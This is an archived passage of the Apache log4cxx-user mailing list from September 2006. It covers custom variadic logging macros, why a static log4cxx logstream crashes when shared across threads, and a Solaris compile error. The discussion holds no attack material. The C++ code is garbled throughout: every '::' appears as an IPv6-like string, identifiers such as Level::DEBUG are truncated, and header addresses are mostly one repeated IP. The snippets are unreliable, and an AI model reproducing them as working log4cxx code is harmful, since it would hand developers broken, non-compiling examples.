________________________________________________________________________ > The information transmitted is intended only for the person(s) or entity > to which it is addressed and may contain confidential and/or privileged > material. Any review, retransmission, dissemination or other use of, or > taking of any action in reliance upon, this information by persons or > entities other than the intended recipient is prohibited. If you > received this in error, please contact the sender and delete the > material from any computer. > > Paremus Limited. > 107-111 Fleet Street, London EC4A 2AB. Phone number (603)363-6787 > ________________________________________________________________________ > ------=_Part_343746_21362337.1158588374103 Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline yeah. I prefer this way.&nbsp; That's what i want.<br><br>Thanks all, :)<br><br><div><span class="gmail_quote">On 9/18/06, <b class="gmail_sendername">Derek Baum</b> &lt;<a href="mailto:[email protected]">[email protected] </a>&gt; wrote:</span><blockquote class="gmail_quote" style="border-left: 1px solid rgb(204, 204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;">I've defined my own logging macros that use &lt;sstream&gt;, for example: <br><br>&gt; #include &lt;sstream&gt;<br>&gt;<br>&gt; // define logging macros using streams<br>&gt; #define LOG_LOG(_logger_, _level_, _message_) { \<br>&gt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if (_logger_-&gt;isEnabledFor(_level_)) {\<br>&gt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; acf:4db6:5e0b:f386:43a5:35d7:718d:3c8bstacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bstringstream sstr;\ <br>&gt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; sstr &lt;&lt; _message_;\<br>&gt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; _logger_-&gt;forcedLog(_level_, sstr.str(), LOG4CXX_LOCATION); } }<br>&gt;<br>&gt; #define LOG_DEBUG(_logger_, _message_)&nbsp;&nbsp;LOG_LOG(_logger_,<br>&gt; acf:4db6:5e0b:f386:43a5:35d7:718d:3c8blog4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLevelacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bUG, _message_) <br>&gt; #define LOG_ERROR(_logger_, _message_)&nbsp;&nbsp;LOG_LOG(_logger_,<br>&gt; acf:4db6:5e0b:f386:43a5:35d7:718d:3c8blog4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLevelacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bRROR, _message_)<br><br>I can then use something like this:<br><br>LOG_ERROR(&quot;something nasty happened: status=&quot; &lt;&lt; status &lt;&lt; &quot;, value=&quot; &lt;&lt; <br>value);<br><br>This has the effect of allowing multiple arguments (although in fact the<br>whole expression is a single macro argument).<br>Additionally, it allows easy use of objects ostream methods, to allow<br>them to describe their own state/value. <br><br>Hope this helps,<br><br>Derek<br><br><br>Curt Arnold wrote:<br>&gt;<br>&gt; On Sep 17, 2006, at 1:58 PM, sishen wrote:<br>&gt;<br>&gt;&gt; Hey. everyone.<br>&gt;&gt;<br>&gt;&gt; I'm a new user of log4cxx. I want to know whether log4cxx support <br>&gt;&gt; variable argument?<br>&gt;&gt; I have found the maillist archive, but i haven't got any answers.<br>&gt;&gt;<br>&gt;&gt; for example, like the macro:<br>&gt;&gt; #define&nbsp;&nbsp;LOG4CXX_DEBUG(logger, message)<br>&gt;&gt; <br>&gt;&gt; it only takes two argument.&nbsp;&nbsp;And now i have to combine all argument<br>&gt;&gt; to a string.<br>&gt;&gt;<br>&gt;&gt; This is not convenient. I think variable-argument is common for<br>&gt;&gt; logging system. <br>&gt;&gt; Any advice prefer, :)<br>&gt;<br>&gt;<br>&gt; No, however the message parameter can be an expression, the expression<br>&gt; could be a function that takes varargs or has multiple signatures.<br>&gt; The expression is only evaluated if the threshold is satisified, so if <br>&gt; you do something like:<br>&gt;<br>&gt; LOG4CXX_INFO(logger, logfmt(&quot;%s %s %d&quot;, arg1, arg2, arg3));<br>&gt;<br>&gt; The logfmt method would only be called if logger's threshold level is<br>&gt; INFO or above (where logfmt would be a method you defined that <br>&gt; returned stacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bstring or stacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bwstring).&nbsp;&nbsp;The LOG4CXX_INFO are<br>&gt; preprocessor macros which handle all the details in passing the caller<br>&gt; information to the actual logger methods.&nbsp;&nbsp;If they were not<br>&gt; preprocessor macros the __LINE__ and __FILE__ would refer the the <br>&gt; location of the method implementation, not the caller.&nbsp;&nbsp;As<br>&gt; preprocessor macros, they do not have the ability to overload the<br>&gt; macro name with multiple definitions for different argument lists.<br><br> ________________________________________________________________________<br>The information transmitted is intended only for the person(s) or entity<br>to which it is addressed and may contain confidential and/or privileged <br>material. Any review, retransmission, dissemination or other use of, or<br>taking of any action in reliance upon, this information by persons or<br>entities other than the intended recipient is prohibited. If you<br>received this in error, please contact the sender and delete the <br>material from any computer.<br><br>Paremus Limited.<br>107-111 Fleet Street, London EC4A 2AB.&nbsp;&nbsp;Phone number (603)363-6787<br>________________________________________________________________________<br></blockquote> </div><br> ------=_Part_343746_21362337.1158588374103-- From [email protected] Tue Sep 19 08:26:11 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 78549 invoked from network); 19 Sep 2006 08:26:11 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 19 Sep 2006 08:26:11 -0000 Received: (qmail 45226 invoked by uid 500); 19 Sep 2006 08:26:10 -0000 Delivered-To: [email protected] Received: (qmail 45207 invoked by uid 500); 19 Sep 2006 08:26:09 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: "Log4CXX User" <[email protected]> List-Id: <log4cxx-user.logging.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 45196 invoked by uid 99); 19 Sep 2006 08:26:09 -0000 Received: from idunn.apache.osuosl.org (HELO idunn.apache.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 19 Sep 2006 01:26:09 -0700 X-ASF-Spam-Status: No, hits=0.0 required=5.0 tests= Received: from ([161.129.204.104:54053] helo=vc1.net.titech.ac.jp) by idunn.apache.osuosl.org (ecelerity 2.1 r(10620)) with ESMTP id E2/88-26148-D99AF054 for <[email protected]>; Tue, 19 Sep 2006 01:26:05 -0700 Received: from vc1.local (localhost.localdomain [161.129.204.104]) by vc1.local (Postfix) with ESMTP id 3F8281D359C for <[email protected]>; Tue, 19 Sep 2006 17:26:01 +0900 (JST) Received: from [161.129.204.104] (zenigata.pi.titech.ac.jp [161.129.204.104]) by vc1.net.titech.ac.jp (Postfix) with ESMTP id 33FEA1D3546 for <[email protected]>; Tue, 19 Sep 2006 17:26:01 +0900 (JST) Message-ID: <[email protected]> Date: Tue, 19 Sep 2006 17:27:49 +0900 From: Salvati Marc <[email protected]> User-Agent: Mozilla Thunderbird 1.0.2 (Windows/20050317) X-Accept-Language: en-us, en MIME-Version: 1.0 To: Log4CXX User <[email protected]> Subject: Re: Thread safety problem References: <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Hellom Thank you for answering. I tried to use log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLevelacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bgetDebug(). It does not change my problem. Aas my Stream and Logger are static, static log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blogstream stream; static log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLoggerPtr logger; I was wondering if I had to "lock" each time I wanted to send a logging message. It looks maybe like a beginners question, but I have no problem and no need to lock with stacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bcout. regards. Curt Arnold wrote: > Could you test using log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLevelacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bgetDebug() instead of > log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLevelacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bUG? The static members DEBUG, INFO, etc are held > over from 0.9.7 and log4j however non-local static member variables > are [email protected]. I believe that DEBUG et al are marked as > deprecated for that reason. I've been tempted to remove them > entirely but that would probably warrant a vote to see how many > people would be affected. > > > On Sep 14, 2006, at 4:02 AM, Salvati Marc wrote: > >> Hello, >> I m using QThread and Log4cxx in a project. I created a simple class >> with static member to access logging anywhere in my soft. >> But when I m accessing from another thread I have some kind of >> random crash. >> I tested without multithread and it work fine. >> It s written in Log4cxx Faq that it s Thread safe. Am I wrong to use >> class static members or is there a bug in the thread safe >> functionnality? Is it problem to use QT Qthread with log4cxx? >> >> Thank you for any kind help. >> Best regards. >> >> here the class declaration, initialization, and log sample. >> >> //my class >> class Log{ >> public : static log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blogstream stream; >> static log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLoggerPtr logger; >> }; >> >> //initialization >> log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLoggerPtr Logacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blogger(log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLoggeracf:4db6:5e0b:f386:43a5:35d7:718d:3c8bgetLogger("Logger")); >> log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blogstream Logacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bstream(Logacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blogger, log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLevelacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bUG); >> >> //logging sample >> Logacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bstream<<"message"<<LOG4CXX_ENDMSG; > > > > > From [email protected] Tue Sep 19 13:15:51 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 97288 invoked from network); 19 Sep 2006 13:15:50 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 19 Sep 2006 13:15:50 -0000 Received: (qmail 79679 invoked by uid 500); 19 Sep 2006 13:15:49 -0000 Delivered-To: [email protected] Received: (qmail 79653 invoked by uid 500); 19 Sep 2006 13:15:48 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: "Log4CXX User" <[email protected]> List-Id: <log4cxx-user.logging.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 79642 invoked by uid 99); 19 Sep 2006 13:15:48 -0000 Received: from idunn.apache.osuosl.org (HELO idunn.apache.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 19 Sep 2006 06:15:48 -0700 X-ASF-Spam-Status: No, hits=0.0 required=5.0 tests= Received: from ([161.129.204.104:27902] helo=smtp107.sbc.mail.mud.yahoo.com) by idunn.apache.osuosl.org (ecelerity 2.1 r(10620)) with ESMTP id 61/C1-27824-F7DEF054 for <[email protected]>; Tue, 19 Sep 2006 06:15:44 -0700 Received: (qmail 81981 invoked from network); 19 Sep 2006 13:15:39 -0000 Received: from unknown (HELO ?161.129.204.104?) ([email protected]@161.129.204.104 with plain) by smtp107.sbc.mail.mud.yahoo.com with SMTP; 19 Sep 2006 13:15:38 -0000 Mime-Version: 1.0 (Apple Message framework v752.2) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> Content-Type: text/plain; charset=US-ASCII; delsp=yes; format=flowed Message-Id: <[email protected]> Content-Transfer-Encoding: 7bit From: Curt Arnold <[email protected]> Subject: Re: Thread safety problem Date: Tue, 19 Sep 2006 08:15:36 -0500 To: Log4CXX User <[email protected]> X-Mailer: Apple Mail (2.752.2) X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N On Sep 19, 2006, at 3:27 AM, Salvati Marc wrote: > Hellom > Thank you for answering. I tried to use log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLevelacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bgetDebug(). > It does not change my problem. > Aas my Stream and Logger are static, > static log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blogstream stream; > static log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLoggerPtr logger; > I was wondering if I had to "lock" each time I wanted to send a > logging message. It looks maybe like a beginners question, but I > have no problem and no need to lock with stacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bcout. > > regards. > > Sorry, I did not notice that an instance of logstream was static in your example. log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLogger is designed to be thread-safe and can be since every operation is atomic. However, since several method calls on a logstream may participate in the generation of one message, there is no effective means that logstream could be internally synchronized and preserve the callers intent. The anticipated use of logstream is that it would be declared within a method body and a single instance would be exclusive to a single thread. For example: Logacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bstream<<"message"<<LOG4CXX_ENDMSG; is equivalent to: Logacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bstream.operator<<("message"); Logacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bstreamacf:4db6:5e0b:f386:43a5:35d7:718d:3c8boperator<<(LocationFlush(__FILE__, __LINE__, ...)); Even if all operator<<'s had internal synchronization, you could still have other calls to the same logstream occurring between the insertion of "message" and the insertion of the LocationFlush object which triggers the call to Loggeracf:4db6:5e0b:f386:43a5:35d7:718d:3c8bug(). The intended use of logstream would be like: class Foo { private: static log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLoggerPtr logger; public: Foo(); void run(); } log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLoggerPtr Fooacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blogger(log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLoggeracf:4db6:5e0b:f386:43a5:35d7:718d:3c8bgetLogger("Foo")); Fooacf:4db6:5e0b:f386:43a5:35d7:718d:3c8boo() { log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blogstream stream(logger, log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLevelacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bgetDebug()); stream << "message" << LOG4CXX_ENDMSG; } void Fooacf:4db6:5e0b:f386:43a5:35d7:718d:3c8brun() { log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blogstream stream(logger, log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLevelacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bgetInfo()); stream << "message" << LOG4CXX_ENDMSG; } Obviously that type of usage demands that construction of logstream be as cheap as possible. Unfortunately, the STL stream base template constructors seem to be pretty expensive. I like the semantics of the current logstream, but the performance isn't where it needs to be and it may not be possible to preserve full compatibility with STL stream semantics and get reasonable performance. All that to say that log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blogstream is still experimental and subject to change or removal. From [email protected] Wed Sep 20 03:29:40 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 68445 invoked from network); 20 Sep 2006 03:29:40 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Sep 2006 03:29:40 -0000 Received: (qmail 87074 invoked by uid 500); 20 Sep 2006 03:29:38 -0000 Delivered-To: [email protected] Received: (qmail 87056 invoked by uid 500); 20 Sep 2006 03:29:38 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: "Log4CXX User" <[email protected]> List-Id: <log4cxx-user.logging.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 87045 invoked by uid 99); 20 Sep 2006 03:29:38 -0000 Received: from idunn.apache.osuosl.org (HELO idunn.apache.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 19 Sep 2006 20:29:38 -0700 X-ASF-Spam-Status: No, hits=0.0 required=5.0 tests= Received: from ([161.129.204.104:41909] helo=smtp004.mail.ukl.yahoo.com) by idunn.apache.osuosl.org (ecelerity 2.1 r(10620)) with ESMTP id AD/C4-00639-B95B0154 for <[email protected]>; Tue, 19 Sep 2006 20:29:32 -0700 Received: (qmail 48220 invoked from network); 20 Sep 2006 03:29:28 -0000 Received: from unknown (HELO ?161.129.204.104?) ([email protected] with plain) by smtp004.mail.ukl.yahoo.com with SMTP; 20 Sep 2006 03:29:27 -0000 Message-ID: <[email protected]> Date: Wed, 20 Sep 2006 12:29:21 +0900 From: salvati marc <[email protected]> User-Agent: Mozilla Thunderbird 1.0.2 (Windows/20050317) X-Accept-Language: en-us, en MIME-Version: 1.0 To: Log4CXX User <[email protected]> Subject: Re: Thread safety problem References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Hello, thank you for your answer. I was wondering why there where no problem with stacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bcout, while there was with log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bstream... if internal is synchronised, it shouldnt crash and have the same behavior as stacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bcout, no? > For example: > > Logacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bstream<<"message"<<LOG4CXX_ENDMSG; > > is equivalent to: > > Logacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bstream.operator<<("message"); > Logacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bstreamacf:4db6:5e0b:f386:43a5:35d7:718d:3c8boperator<<(LocationFlush(__FILE__, __LINE__, ...)); > > Even if all operator<<'s had internal synchronization, you could > still have other calls to the same logstream occurring between the > insertion of "message" and the insertion of the LocationFlush object > which triggers the call to Loggeracf:4db6:5e0b:f386:43a5:35d7:718d:3c8bug(). of course it can maybe not preserve my intent....i could not get the message i was thinking to... but it shouldnt crash, no? regards ___________________________________________________________________________ Découvrez un nouveau moyen de poser toutes vos questions quelque soit le sujet ! Yahoo! Questions/Réponses pour partager vos connaissances, vos opinions et vos expériences. http://fr.answers.yahoo.com From [email protected] Wed Sep 20 08:38:19 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 50236 invoked from network); 20 Sep 2006 08:38:18 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Sep 2006 08:38:18 -0000 Received: (qmail 56619 invoked by uid 500); 20 Sep 2006 08:38:17 -0000 Delivered-To: [email protected] Received: (qmail 56591 invoked by uid 500); 20 Sep 2006 08:38:17 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: "Log4CXX User" <[email protected]> List-Id: <log4cxx-user.logging.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 56580 invoked by uid 99); 20 Sep 2006 08:38:17 -0000 Received: from idunn.apache.osuosl.org (HELO idunn.apache.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 20 Sep 2006 01:38:17 -0700 Authentication-Results: idunn.apache.osuosl.org [email protected]; domainkeys=good X-ASF-Spam-Status: No, hits=0.0 required=5.0 tests=RCVD_BY_IP DomainKey-Status: good X-DomainKeys: Ecelerity dk_validate implementing draft-delany-domainkeys-base-01 Received: from ([161.129.204.104:42026] helo=nf-out-0910.google.com) by idunn.apache.osuosl.org (ecelerity 2.1 r(10620)) with ESMTP id 93/00-00532-8EDF0154 for <[email protected]>; Wed, 20 Sep 2006 01:38:00 -0700 Received: by nf-out-0910.google.com with SMTP id o60so442597nfa for <[email protected]>; Wed, 20 Sep 2006 01:37:57 -0700 (PDT) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=Q3yg125YYiDhr+FaxV5utN5fqMviv5lom/xAeBXTVIpOAM6Av1aGDpNfxG0VFxrBw4aiWtK+81OPvUsolYcVVrmqyeGgwviBVm1g3mSzJIbCt0qchWGzsGDsSEvS/YEJg5o6f2ZajxHAe/l2dcyBEvDmb20pigAJcEEVU9/TX9g= Received: by 161.129.204.104 with SMTP id x3mr4392560huf; Wed, 20 Sep 2006 01:37:56 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Wed, 20 Sep 2006 01:37:56 -0700 (PDT) Message-ID: <[email protected]> Date: Wed, 20 Sep 2006 10:37:56 +0200 From: "Tanguy Le Gall" <[email protected]> To: [email protected] Subject: Re: Problem when using log4cxx 0.9.7 In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline References: <[email protected]> X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Hello, I'm having a really strange error when using the log4cxx 0.9.7 library, I get the following message when compiling: -> include/log4cxx/helpers/objectptr.h", line 136: Error: Pointer type needed instead of const stacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bofstream . Did anybody ever encounter this problem and more importantly, solved it? :) I'm using a SunOs 5.8 platform with SunOne Studio 8 Thanks. Tanguy From [email protected] Wed Sep 20 09:04:08 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 58976 invoked from network); 20 Sep 2006 09:04:07 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Sep 2006 09:04:07 -0000 Received: (qmail 16518 invoked by uid 500); 20 Sep 2006 09:04:05 -0000 Delivered-To: [email protected] Received: (qmail 16505 invoked by uid 500); 20 Sep 2006 09:04:05 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: "Log4CXX User" <[email protected]> List-Id: <log4cxx-user.logging.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 16487 invoked by uid 99); 20 Sep 2006 09:04:05 -0000 Received: from idunn.apache.osuosl.org (HELO idunn.apache.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 20 Sep 2006 02:04:05 -0700 X-ASF-Spam-Status: No, hits=0.0 required=5.0 tests= Received: from ([161.129.204.104:38554] helo=decibel.pvv.ntnu.no) by idunn.apache.osuosl.org (ecelerity 2.1 r(10620)) with ESMTP id C2/F0-00532-8E301154 for <[email protected]>; Wed, 20 Sep 2006 02:03:38 -0700 Received: from josteitv by decibel.pvv.ntnu.no with local (Exim 4.60) (envelope-from <[email protected]>) id 1GPxzQ-00006a-Cn for [email protected]; Wed, 20 Sep 2006 11:03:32 +0200 To: "Log4CXX User" <[email protected]> Subject: Re: Problem when using log4cxx 0.9.7 References: <[email protected]> <[email protected]> From: Jostein Tveit <[email protected]> Organization: Norwegian University of Science and Technology Date: Wed, 20 Sep 2006 11:03:32 +0200 In-Reply-To: <[email protected]> (Tanguy Le Gall's message of "Wed, 20 Sep 2006 10:37:56 +0200") Message-ID: <[email protected]> User-Agent: Gnus/5.1006 (Gnus v5.10.6) Emacs/21.4 (gnu/linux) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N "Tanguy Le Gall" <[email protected]> writes: > I'm having a really strange error when using the log4cxx 0.9.7 > library, I get the following message when compiling: Try to compile the latest revision from the repository. It worked fine for me on Solaris 8 with Sun Stuido 11. See: http://marc.theaimsgroup.com/?l=log4cxx-user&m=114908626202067&w=2 -- Jostein Tveit <[email protected]> From [email protected] Wed Sep 20 09:29:18 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 67467 invoked from network); 20 Sep 2006 09:29:17 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Sep 2006 09:29:17 -0000 Received: (qmail 70000 invoked by uid 500); 20 Sep 2006 09:29:17 -0000 Delivered-To: [email protected] Received: (qmail 69970 invoked by uid 500); 20 Sep 2006 09:29:16 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: "Log4CXX User" <[email protected]> List-Id: <log4cxx-user.logging.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 69957 invoked by uid 99); 20 Sep 2006 09:29:16 -0000 Received: from idunn.apache.osuosl.org (HELO idunn.apache.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 20 Sep 2006 02:29:16 -0700 Authentication-Results: idunn.apache.osuosl.org [email protected]; domainkeys=good X-ASF-Spam-Status: No, hits=0.0 required=5.0 tests=RCVD_BY_IP DomainKey-Status: good X-DomainKeys: Ecelerity dk_validate implementing draft-delany-domainkeys-base-01 Received: from ([161.129.204.104:37525] helo=nf-out-0910.google.com) by idunn.apache.osuosl.org (ecelerity 2.1 r(10620)) with ESMTP id 12/D1-00532-5D901154 for <[email protected]>; Wed, 20 Sep 2006 02:28:54 -0700 Received: by nf-out-0910.google.com with SMTP id o60so455492nfa for <[email protected]>; Wed, 20 Sep 2006 02:28:50 -0700 (PDT) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=NCDCN2qGZ73WntrrqTVBpecSEdFnYUrpun1WXs8W5JVQt9zrlcjOIVE47NsZP8zOoY6tCFl7LV7IXPhmn+X1Z7KRFnNbDuNEoB4G45Jjf2PjgYhV5F6qnZbUSmsf0RRzKcll65wwK0EiMuqG6jN2GBVUUt3/SyWENErNuDHT9sM= Received: by 161.129.204.104 with SMTP id m34mr4411697huc; Wed, 20 Sep 2006 02:28:50 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Wed, 20 Sep 2006 02:28:50 -0700 (PDT) Message-ID: <[email protected]> Date: Wed, 20 Sep 2006 11:28:50 +0200 From: "Tanguy Le Gall" <[email protected]> To: "Log4CXX User" <[email protected]> Subject: Re: Problem when using log4cxx 0.9.7 In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline References: <[email protected]> <[email protected]> <[email protected]> X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Thanks for your reply, however I don't have any problems with compiling the library by itself, that was already done. The error message appears when I'm compiling my source with the includes to the log4cxx librarie. Did you actually run into this precise problem? Tanguy On 9/20/06, Jostein Tveit <[email protected]> wrote: > "Tanguy Le Gall" <[email protected]> writes: > > > I'm having a really strange error when using the log4cxx 0.9.7 > > library, I get the following message when compiling: > > Try to compile the latest revision from the repository. It worked > fine for me on Solaris 8 with Sun Stuido 11. > > See: http://marc.theaimsgroup.com/?l=log4cxx-user&m=114908626202067&w=2 > > -- > Jostein Tveit <[email protected]> > From [email protected] Fri Sep 22 08:58:19 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 12529 invoked from network); 22 Sep 2006 08:58:19 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 22 Sep 2006 08:58:19 -0000 Received: (qmail 96539 invoked by uid 500); 22 Sep 2006 08:58:19 -0000 Delivered-To: [email protected] Received: (qmail 96260 invoked by uid 500); 22 Sep 2006 08:58:18 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: "Log4CXX User" <[email protected]> List-Id: <log4cxx-user.logging.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 96249 invoked by uid 99); 22 Sep 2006 08:58:18 -0000 Received: from idunn.apache.osuosl.org (HELO idunn.apache.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 22 Sep 2006 01:58:18 -0700 Authentication-Results: idunn.apache.osuosl.org [email protected]; spf=pass X-ASF-Spam-Status: No, hits=2.8 required=5.0 tests=HTML_MESSAGE,INFO_TLD Received-SPF: pass (idunn.apache.osuosl.org: domain stl.es designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] ([161.129.204.104:33519] helo=psintstl1.stl.es) by idunn.apache.osuosl.org (ecelerity 161.129.204.104 r(12930)) with ESMTP id 7A/62-06791-8A5A3154 for <[email protected]>; Fri, 22 Sep 2006 01:58:17 -0700 Received: from localhost (localhost.localdomain [161.129.204.104]) by psintstl1.stl.es (Postfix) with ESMTP id 136D32070E0 for <[email protected]>; Fri, 22 Sep 2006 10:58:13 +0200 (CEST) Received: from psintstl1.stl.es ([161.129.204.104]) by localhost (psintstl1.stl.es [161.129.204.104]) (amavisd-new, port 10024) with ESMTP id 04164-10 for <[email protected]>; Fri, 22 Sep 2006 10:58:12 +0200 (CEST) Received: from SRVOFI.stl.es (srvofi4.stl.es [161.129.204.104]) by psintstl1.stl.es (Postfix) with ESMTP id B9F3F206FCB for <[email protected]>; Fri, 22 Sep 2006 10:58:12 +0200 (CEST) 